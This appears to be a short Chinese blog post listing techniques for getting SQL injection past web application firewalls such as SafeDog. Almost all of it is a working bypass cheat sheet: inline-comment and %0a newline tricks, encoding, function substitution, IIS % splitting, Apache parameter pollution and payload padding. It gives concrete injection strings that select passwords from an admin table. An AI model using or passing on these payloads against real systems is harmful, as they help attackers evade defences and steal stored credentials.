Sql——bypass

常见绕WAF手法:

①、大小写绕过、替换绕过/*例如双写*/;(很老的WAF才有用)

例如:and => &;0x31=>1;0x32=>2.......

②、特殊字符+内联注释绕过:

%0a  换行;

/* */   数据库注释;安全狗会人为/* */ 中式安全的;

/* ! */   内联注释;(内联注释是MYSQL为了保持与其它数据兼容,将MYSQL中特有的语句放在/*! */中,这些语句在不兼容的数据库中不执行,而在MYSQL自身却能识别,执行。/*!50000*/表示数据库版本=>5.00.00时中间的语句才能被执行)

有些函数加了‘’可以执行:常见有sleep(),updatexml();

例如:

id=1 union %23/* %0a select password from admin %23*/

id=1 union /*! 10086*/ select 1,2,3  -- %23/* %0a from admin  %23*/(版本号可以通过burp爆破;-- %23是单行注释,为了注释/*)

③、编码绕过:比如会多次解码的东西;

④、等价替换:利用其它函数替代;

例如:union %23%0a select 被拦截时,可以替换为 union all %23%0a select;

⑤、容器特性:Apace的Hpp,或者是IIS的%分割;

例如:iss中间件:s%e%l%e%c%t => select;

Apace(参数污染): id=1/*&id=2 union select password from admin %23*/(同时传参2个取最后一个)

⑥、白名单:管理员权限或者是127.0.0.1本地访问不拦截;

⑦、缓冲区:传参的数据超出WAF检测的范围(POST传参);

例如;id=1 /*ABAB.......ABAB*/ union select * from admin (安全狗一般是填充4000字符左右)

 

 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值